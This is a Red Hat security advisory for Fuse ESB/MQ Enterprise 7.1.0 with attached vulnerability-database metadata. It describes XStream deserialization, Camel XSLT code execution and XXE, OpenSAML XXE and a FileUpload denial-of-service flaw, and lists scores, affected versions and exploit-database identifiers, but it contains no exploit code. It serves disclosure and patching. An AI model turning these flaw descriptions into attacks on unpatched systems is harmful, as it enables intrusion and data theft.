ID RHSA-2014:0452 Type redhat Reporter RedHat Modified 2019-03-22T23:43:52
Description
Fuse ESB Enterprise is an integration platform based on Apache ServiceMix.
Fuse MQ Enterprise, based on Apache ActiveMQ, is a standards-compliant
messaging system that is tailored for use in mission critical applications.
This release of Fuse ESB Enterprise/MQ Enterprise 7.1.0 R1 P3 is an update
to Fuse ESB Enterprise 7.1.0 and Fuse MQ Enterprise 7.1.0. It includes
various bug fixes, which are listed in the README file included with the
patch files.
The following security issues are also addressed with this release:
It was found that XStream could deserialize arbitrary user-supplied XML
content, representing objects of any type. A remote attacker able to pass
XML to XStream could use this flaw to perform a variety of attacks,
including remote code execution in the context of the server running the
XStream application. (CVE-2013-7285)
It was found that the Apache Camel XSLT component allowed XSL stylesheets
to call external Java methods. A remote attacker able to submit messages to
a Camel route could use this flaw to perform arbitrary remote code
execution in the context of the Camel server process. (CVE-2014-0003)
It was found that the ParserPool and Decrypter classes in the OpenSAML Java
implementation resolved external entities, permitting XML External Entity
(XXE) attacks. A remote attacker could use this flaw to read files
accessible to the user running the application server and, potentially,
perform other more advanced XXE attacks. (CVE-2013-6440)
It was found that the Apache Camel XSLT component would resolve entities in
XML messages when transforming them using an XSLT route. A remote attacker
able to submit messages to an XSLT Camel route could use this flaw to read
files accessible to the user running the application server and,
potentially, perform other more advanced XXE attacks. (CVE-2014-0002)
A denial of service flaw was found in the way Apache Commons FileUpload
handled small-sized buffers used by MultipartStream. A remote attacker
could use this flaw to create a malformed Content-Type header for a
multipart request, causing Apache Commons FileUpload to enter an infinite
loop when processing such an incoming request. (CVE-2014-0050)
The CVE-2014-0002 and CVE-2014-0003 issues were discovered by David Jorm of
the Red Hat Security Response Team, and the CVE-2013-6440 issue was
discovered by David Illsley, Ron Gutierrez of Gotham Digital Science, and
David Jorm of the Red Hat Security Response Team.
All users of Fuse ESB Enterprise/MQ Enterprise 7.1.0 as provided from the
Red Hat Customer Portal are advised to upgrade to Fuse ESB Enterprise/MQ
Enterprise 7.1.0 R1 P3.
{"id": "RHSA-2014:0452", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2014:0452) Important: Fuse ESB Enterprise/Fuse MQ Enterprise 7.1.0 update", "description": "Fuse ESB Enterprise is an integration platform based on Apache ServiceMix.\nFuse MQ Enterprise, based on Apache ActiveMQ, is a standards-compliant\nmessaging system that is tailored for use in mission critical applications.\n\nThis release of Fuse ESB Enterprise/MQ Enterprise 7.1.0 R1 P3 is an update\nto Fuse ESB Enterprise 7.1.0 and Fuse MQ Enterprise 7.1.0. It includes\nvarious bug fixes, which are listed in the README file included with the\npatch files.\n\nThe following security issues are also addressed with this release:\n\nIt was found that XStream could deserialize arbitrary user-supplied XML\ncontent, representing objects of any type. A remote attacker able to pass\nXML to XStream could use this flaw to perform a variety of attacks,\nincluding remote code execution in the context of the server running the\nXStream application. (CVE-2013-7285)\n\nIt was found that the Apache Camel XSLT component allowed XSL stylesheets\nto call external Java methods. A remote attacker able to submit messages to\na Camel route could use this flaw to perform arbitrary remote code\nexecution in the context of the Camel server process. (CVE-2014-0003)\n\nIt was found that the ParserPool and Decrypter classes in the OpenSAML Java\nimplementation resolved external entities, permitting XML External Entity\n(XXE) attacks. A remote attacker could use this flaw to read files\naccessible to the user running the application server and, potentially,\nperform other more advanced XXE attacks. (CVE-2013-6440)\n\nIt was found that the Apache Camel XSLT component would resolve entities in\nXML messages when transforming them using an XSLT route. A remote attacker\nable to submit messages to an XSLT Camel route could use this flaw to read\nfiles accessible to the user running the application server and,\npotentially, perform other more advanced XXE attacks. (CVE-2014-0002)\n\nA denial of service flaw was found in the way Apache Commons FileUpload\nhandled small-sized buffers used by MultipartStream. A remote attacker\ncould use this flaw to create a malformed Content-Type header for a\nmultipart request, causing Apache Commons FileUpload to enter an infinite\nloop when processing such an incoming request. (CVE-2014-0050)\n\nThe CVE-2014-0002 and CVE-2014-0003 issues were discovered by David Jorm of\nthe Red Hat Security Response Team, and the CVE-2013-6440 issue was\ndiscovered by David Illsley, Ron Gutierrez of Gotham Digital Science, and\nDavid Jorm of the Red Hat Security Response Team.\n\nAll users of Fuse ESB Enterprise/MQ Enterprise 7.1.0 as provided from the\nRed Hat Customer Portal are advised to upgrade to Fuse ESB Enterprise/MQ\nEnterprise 7.1.0 R1 P3.\n", "published": "2014-04-30T04:00:00", "modified": "2019-03-22T23:43:52", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://access.redhat.com/errata/RHSA-2014:0452", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2013-6440", "CVE-2013-7285", "CVE-2014-0002", "CVE-2014-0003", "CVE-2014-0050"], "lastseen": "2019-05-29T14:35:34", "viewCount": 31, "enchantments": {"score": {"value": 8.0, "vector": "NONE", "modified": "2019-05-29T14:35:34", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-6440", "CVE-2014-0003", "CVE-2013-7285", "CVE-2014-0002", "CVE-2014-0050"]}, {"type": "redhat", "idList": ["RHSA-2014:0253", "RHSA-2014:0294", "RHSA-2014:0459", "RHSA-2014:0372", "RHSA-2014:0195", "RHSA-2014:0371", "RHSA-2014:0216", "RHSA-2014:0389", "RHSA-2014:0252", "RHSA-2014:0323"]}, {"type": "f5", "idList": ["F5:K15189", "SOL15189"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32033", "SECURITYVULNS:VULN:14470", "SECURITYVULNS:DOC:30435"]}, {"type": "seebug", "idList": ["SSV:61443", "SSV:84935", "SSV:61629", "SSV:61642"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:868FED2D5F6215B2F39518F65E3C1404", "EXPLOITPACK:EB000848EE6583FA3B8F33FA4CDD34C0"]}, {"type": "gentoo", "idList": ["GLSA-201612-35"]}, {"type": "zdt", "idList": ["1337DAY-ID-24847", "1337DAY-ID-21887"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310867544", "OPENVAS:1361412562310804251", "OPENVAS:1361412562310850747", "OPENVAS:867544", "OPENVAS:1361412562310867530", "OPENVAS:1361412562310120359", "OPENVAS:1361412562310103919", "OPENVAS:867530", "OPENVAS:867523", "OPENVAS:702856"]}, {"type": "nessus", "idList": ["ARTIFACTORY_3_1_1_1.NASL", "SUSE_11_JAKARTA-COMMONS-FILEUPLOAD-140403.NASL", "REDHAT-RHSA-2014-0389.NASL", "OPENSUSE-2014-298.NASL", "WEBSPHERE_PORTAL_CVE-2014-0050.NASL", "DEBIAN_DSA-2856.NASL", "FEDORA_2014-2372.NASL", "FEDORA_2014-2340.NASL", "GENTOO_GLSA-201612-35.NASL", "VMWARE_ORCHESTRATOR_APPLIANCE_VMSA_2014_0007.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:135150"]}, {"type": "exploitdb", "idList": ["EDB-ID:31615", "EDB-ID:39193"]}, {"type": "fedora", "idList": ["FEDORA:CB46E23C05", "FEDORA:04A5C23F7A", "FEDORA:EA6192175F", "FEDORA:58AC321FC4"]}, {"type": "github", "idList": ["GHSA-XX68-JFCG-XMMF", "GHSA-F554-X222-WGF7", "GHSA-2FW5-RVF2-JQ56", "GHSA-H6RP-8V4J-HWPH"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-32557", "ATLASSIAN:CONF-32557"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/HTTP/APACHE_COMMONS_FILEUPLOAD_DOS"]}, {"type": "suse", "idList": ["SUSE-SU-2014:0548-1"]}, {"type": "jvn", "idList": ["JVN:14876762"]}, {"type": "amazon", "idList": ["ALAS-2014-312"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2856-1:D2DA2"]}, {"type": "freebsd", "idList": ["3E0507C6-9614-11E3-B3A5-00E0814CAB4E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995222"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20140707-01-STRUTS2"]}], "modified": "2019-05-29T14:35:34", "rev": 2}, "vulnersScore": 8.0}, "affectedPackage": []}
{"cve": [{"lastseen": "2021-02-02T06:07:01", "description": "Xstream API versions up to 1.4.6 and version 1.4.10, if the security framework has not been initialized, may allow a remote attacker to run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. e.g. JSON.", "edition": 9, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-05-15T17:29:00", "title": "CVE-2013-7285", "type": "cve", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7285"], "modified": "2020-10-20T22:15:00", "cpe": ["cpe:/a:xstream_project:xstream:1.4.10", "cpe:/a:xstream_project:xstream:1.4.6"], "id": "CVE-2013-7285", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7285", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:xstream_project:xstream:1.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:xstream_project:xstream:1.4.6:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:07:00", "description": "The (1) BasicParserPool, (2) StaticBasicParserPool, (3) XML Decrypter, and (4) SAML Decrypter in Shibboleth OpenSAML-Java before 2.6.1 set the expandEntityReferences property to true, which allows remote attackers to conduct XML external entity (XXE) attacks via a crafted XML DOCTYPE declaration.", "edition": 6, "cvss3": {}, "published": "2014-02-14T15:55:00", "title": "CVE-2013-6440", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6440"], "modified": "2014-03-06T04:49:00", "cpe": ["cpe:/a:shibboleth:opensaml:2.4.1", "cpe:/a:shibboleth:opensaml:2.5.2", "cpe:/a:shibboleth:opensaml:2.4.3", "cpe:/a:shibboleth:opensaml:2.5.3", "cpe:/a:shibboleth:opensaml:2.4.0", "cpe:/a:shibboleth:opensaml:2.6.0", "cpe:/a:internet2:opensaml:2.0", "cpe:/a:shibboleth:opensaml:2.5.0", "cpe:/a:shibboleth:opensaml:2.4.2", "cpe:/a:internet2:opensaml:2.2.0", "cpe:/a:internet2:opensaml:2.1.0", "cpe:/a:shibboleth:opensaml:2.5.1"], "id": "CVE-2013-6440", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6440", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:shibboleth:opensaml:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:shibboleth:opensaml:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:shibboleth:opensaml:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:shibboleth:opensaml:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:internet2:opensaml:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:shibboleth:opensaml:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:shibboleth:opensaml:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:internet2:opensaml:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:shibboleth:opensaml:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:internet2:opensaml:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:shibboleth:opensaml:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:shibboleth:opensaml:2.4.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:24", "description": "The XSLT component in Apache Camel before 2.11.4 and 2.12.x before 2.12.3 allows remote attackers to read arbitrary files and possibly have other unspecified impact via an XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.", "edition": 7, "cvss3": {}, "published": "2014-03-21T04:38:00", "title": "CVE-2014-0002", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0002"], "modified": "2020-05-18T14:21:00", "cpe": ["cpe:/a:apache:camel:1.0.0", "cpe:/a:apache:camel:1.6.1", "cpe:/a:apache:camel:2.10.2", "cpe:/a:apache:camel:2.10.5", "cpe:/a:apache:camel:1.6.4", "cpe:/a:apache:camel:2.0.0", "cpe:/a:apache:camel:2.11.2", "cpe:/a:apache:camel:2.10.1", "cpe:/a:apache:camel:2.10.0", "cpe:/a:apache:camel:1.1.0", "cpe:/a:apache:camel:2.12.0", "cpe:/a:apache:camel:1.5.0", "cpe:/a:apache:camel:2.10.6", "cpe:/a:apache:camel:1.2.0", "cpe:/a:apache:camel:2.10.4", "cpe:/a:apache:camel:2.1.0", "cpe:/a:apache:camel:1.3.0", "cpe:/a:apache:camel:2.11.1", "cpe:/a:apache:camel:2.10.3", "cpe:/a:apache:camel:2.11.0", "cpe:/a:apache:camel:2.10.7", "cpe:/a:apache:camel:1.6.0", "cpe:/a:apache:camel:2.12.2", "cpe:/a:apache:camel:1.4.0", "cpe:/a:apache:camel:2.11.3", "cpe:/a:apache:camel:1.6.2", "cpe:/a:apache:camel:2.12.1", "cpe:/a:apache:camel:1.6.3"], "id": "CVE-2014-0002", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0002", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:camel:2.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.0.0:milestone3:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.10.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.10.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.10.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.10.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.0.0:milestone1:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.10.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.0.0:milestone2:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.10.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.11.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.5.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:24", "description": "The XSLT component in Apache Camel 2.11.x before 2.11.4, 2.12.x before 2.12.3, and possibly earlier versions allows remote attackers to execute arbitrary Java methods via a crafted message.", "edition": 7, "cvss3": {}, "published": "2014-03-21T04:38:00", "title": "CVE-2014-0003", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0003"], "modified": "2020-05-18T14:21:00", "cpe": ["cpe:/a:apache:camel:1.0.0", "cpe:/a:apache:camel:1.6.1", "cpe:/a:apache:camel:2.10.2", "cpe:/a:apache:camel:2.10.5", "cpe:/a:apache:camel:1.6.4", "cpe:/a:apache:camel:2.0.0", "cpe:/a:apache:camel:2.11.2", "cpe:/a:apache:camel:2.10.1", "cpe:/a:apache:camel:2.10.0", "cpe:/a:apache:camel:1.1.0", "cpe:/a:apache:camel:2.12.0", "cpe:/a:apache:camel:1.5.0", "cpe:/a:apache:camel:2.10.6", "cpe:/a:apache:camel:1.2.0", "cpe:/a:apache:camel:2.10.4", "cpe:/a:apache:camel:2.1.0", "cpe:/a:apache:camel:1.3.0", "cpe:/a:apache:camel:2.11.1", "cpe:/a:apache:camel:2.10.3", "cpe:/a:apache:camel:2.11.0", "cpe:/a:apache:camel:2.10.7", "cpe:/a:apache:camel:1.6.0", "cpe:/a:apache:camel:2.12.2", "cpe:/a:apache:camel:1.4.0", "cpe:/a:apache:camel:2.11.3", "cpe:/a:apache:camel:1.6.2", "cpe:/a:apache:camel:2.12.1", "cpe:/a:apache:camel:1.6.3"], "id": "CVE-2014-0003", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0003", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:camel:2.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.0.0:milestone3:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.10.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.10.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.10.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.10.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.0.0:milestone1:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.10.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.0.0:milestone2:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.10.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.11.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:1.5.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:24", "description": "MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.\nThe previous CVSS assessment ( Base Score: 5.0 - AV:N/AC:L/AU:N/C:N/I:N/A:P) was provided at the time of initial analysis based on the best available published information at that time. The score has been updated to reflect the impact to Oracle products per <a href=http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html> Oracle Critical Patch Update Advisory - October 2015 </a>. Other products listed as vulnerable may or may not be similarly impacted.", "edition": 6, "cvss3": {}, "published": "2014-04-01T06:27:00", "title": "CVE-2014-0050", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0050"], "modified": "2018-10-09T19:35:00", "cpe": ["cpe:/a:apache:commons_fileupload:1.2.1", "cpe:/a:apache:tomcat:7.0.11", "cpe:/a:apache:tomcat:7.0.50", "cpe:/a:apache:tomcat:7.0.40", "cpe:/a:apache:tomcat:7.0.35", "cpe:/a:apache:tomcat:7.0.29", "cpe:/a:oracle:retail_applications:13.0", "cpe:/a:apache:tomcat:7.0.42", "cpe:/a:apache:tomcat:7.0.16", "cpe:/a:oracle:retail_applications:13.4", "cpe:/a:apache:commons_fileupload:1.2.2", "cpe:/a:apache:tomcat:7.0.32", "cpe:/a:apache:commons_fileupload:1.0", "cpe:/a:apache:tomcat:7.0.41", "cpe:/a:apache:tomcat:7.0.49", "cpe:/a:apache:tomcat:7.0.4", "cpe:/a:apache:tomcat:7.0.36", "cpe:/a:apache:tomcat:8.0.0", "cpe:/a:apache:tomcat:7.0.23", "cpe:/a:oracle:retail_applications:13.1", "cpe:/a:apache:tomcat:7.0.37", "cpe:/a:apache:tomcat:7.0.46", "cpe:/a:apache:tomcat:7.0.20", "cpe:/a:apache:tomcat:7.0.3", "cpe:/a:apache:tomcat:7.0.48", "cpe:/a:apache:tomcat:7.0.7", "cpe:/a:apache:tomcat:7.0.24", "cpe:/a:oracle:retail_applications:13.3", "cpe:/a:apache:tomcat:7.0.28", "cpe:/a:apache:tomcat:7.0.44", "cpe:/a:apache:tomcat:7.0.27", "cpe:/a:apache:tomcat:7.0.45", "cpe:/a:apache:tomcat:7.0.13", "cpe:/a:apache:tomcat:7.0.0", "cpe:/a:oracle:retail_applications:12.0", "cpe:/a:apache:tomcat:7.0.15", "cpe:/a:apache:tomcat:7.0.2", "cpe:/a:apache:tomcat:7.0.25", "cpe:/a:oracle:retail_applications:14.0", "cpe:/a:apache:tomcat:7.0.12", "cpe:/a:apache:commons_fileupload:1.2", "cpe:/a:apache:tomcat:7.0.38", "cpe:/a:apache:tomcat:7.0.18", "cpe:/a:apache:commons_fileupload:1.1", "cpe:/a:apache:tomcat:7.0.30", "cpe:/a:apache:tomcat:7.0.22", "cpe:/a:apache:tomcat:7.0.26", "cpe:/a:apache:tomcat:7.0.19", "cpe:/a:apache:tomcat:7.0.33", "cpe:/a:apache:commons_fileupload:1.1.1", "cpe:/a:oracle:retail_applications:13.2", "cpe:/a:apache:tomcat:7.0.17", "cpe:/a:apache:tomcat:7.0.5", "cpe:/a:apache:tomcat:7.0.39", "cpe:/a:apache:tomcat:7.0.9", "cpe:/a:apache:tomcat:7.0.1", "cpe:/a:apache:tomcat:7.0.8", "cpe:/a:apache:tomcat:7.0.47", "cpe:/a:apache:tomcat:7.0.34", "cpe:/a:apache:tomcat:7.0.6", "cpe:/a:apache:tomcat:7.0.14", "cpe:/a:apache:tomcat:7.0.21", "cpe:/a:oracle:retail_applications:12.0in", "cpe:/a:apache:commons_fileupload:1.3", "cpe:/a:apache:tomcat:7.0.10", "cpe:/a:apache:tomcat:7.0.31", "cpe:/a:apache:tomcat:8.0.1", "cpe:/a:apache:tomcat:7.0.43"], "id": "CVE-2014-0050", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0050", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:tomcat:7.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.50:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.44:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:13.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.49:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.48:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.39:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.42:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.2:beta:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:13.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.46:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.4:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.9:*:*:*:*:*:*:*", 